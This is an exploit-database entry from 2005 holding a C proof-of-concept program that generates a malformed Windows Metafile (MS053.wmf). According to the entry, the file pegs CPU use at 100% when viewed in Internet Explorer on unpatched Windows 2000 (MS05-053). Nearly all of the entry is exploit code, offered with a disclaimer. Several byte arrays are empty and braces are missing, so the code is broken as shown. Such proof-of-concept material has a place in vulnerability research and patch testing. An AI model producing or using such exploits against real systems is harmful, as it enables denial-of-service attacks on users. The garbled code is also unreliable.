MS Windows Metafile (gdi32.dll) Denial of Service Exploit (MS05-053)

ID 1337DAY-ID-6068
Type zdt
Reporter Winny Thomas
Modified 2005-11-29T00:00:00


Exploit for unknown platform in category dos / poc

MS Windows Metafile (gdi32.dll) Denial of Service Exploit (MS05-053)

 * Author: Winny Thomas
 *	   Pune, INDIA
 * The crafted metafile from this code when viewed in internet explorer raises the CPU utilization 
 * to 100%. The code was tested on Windows 2000 server SP4. The issue does not occur with the 
 * hotfix for GDI (MS05-053) installed
 * Disclaimer: This code is for educational/testing purposes by authosized persons on 
 * networks/systems setup for such a purpose.The author of this code shall not bear 
 * any responsibility for any damage caused by using this code.

#include <stdio.h>

unsigned char wmfheader[] = 
"\xff\xff\xff\xff" //Metafile file size
"\xff\xff\xff\xff" //Largest record size

unsigned char MetafileRECORD[] = 

unsigned char wmfeof[] = 

int main(int argc, char *argv[])
	FILE *fp;
	char wmfbuf[1024];
	int metafilesize, metafilesizeW, i, j;
	metafilesize = sizeof (wmfheader) + sizeof (MetafileRECORD) + sizeof(wmfeof) -3;
	metafilesizeW = metafilesize/2;
	memcpy((unsigned long *)&wmfheader[28], &metafilesizeW, 4);

	printf("[*] Adding Metafile header\n");
	for (i = 0; i < sizeof(wmfheader) -1; i++) {
		(unsigned char)wmfbuf[i] = (unsigned char)wmfheader[i];
	printf("[*] Adding Metafile records\n");
	for (j = i, i = 0; i < sizeof(MetafileRECORD) -1; i++, j++) {
		wmfbuf[j] = MetafileRECORD[i];
	printf("[*] Adding EOF record\n");
	for (i = 0; i < sizeof(wmfeof) -1; i++, j++) {
		wmfbuf[j] = wmfeof[i];

	printf("[*] Creating Metafile (MS053.wmf)\n");
	fp = fopen("MS053.wmf", "wb");
	fwrite(wmfbuf, 1, metafilesize, fp);

# [2018-01-04]  #